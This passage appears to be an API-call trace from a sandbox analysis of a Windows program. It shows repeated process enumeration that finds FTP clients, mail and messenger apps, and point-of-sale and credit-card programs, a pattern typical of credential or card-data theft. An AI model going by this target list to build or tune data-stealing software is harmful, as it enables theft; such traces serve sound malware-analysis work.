th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0147.002] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0147.006] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0147.008] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0147.010] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0147.012] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0147.017] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0147.019] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0147.021] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0147.023] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0147.025] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0147.027] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0147.031] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0147.033] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0147.035] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0147.037] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0147.039] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0147.042] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0147.043] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0147.045] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0147.048] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0147.050] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0147.052] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0147.057] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0147.059] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0147.061] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0147.063] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0147.065] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0147.068] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0147.070] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0147.072] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0147.075] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0147.077] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0147.079] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0147.082] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0147.084] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0147.086] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0147.088] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0147.090] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.097] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0147.100] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0147.112] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.115] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.118] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0147.121] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0147.124] CloseHandle (hObject=0x1b64) returned 1 [0147.124] Sleep (dwMilliseconds=0x64) [0147.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a80 [0147.308] Process32First (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.310] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.311] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.313] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.316] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.317] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.319] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.321] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.322] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.324] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.325] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.327] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.330] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.331] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.369] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.371] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.373] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.374] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.377] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.378] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.380] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0147.381] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.383] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0147.384] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.386] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0147.387] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0147.389] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0147.391] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0147.392] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0147.394] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.395] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.397] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.398] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0147.400] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0147.402] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.405] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.407] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.409] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.411] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0147.413] Process32Next (in: hSnapshot=0x1a80, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 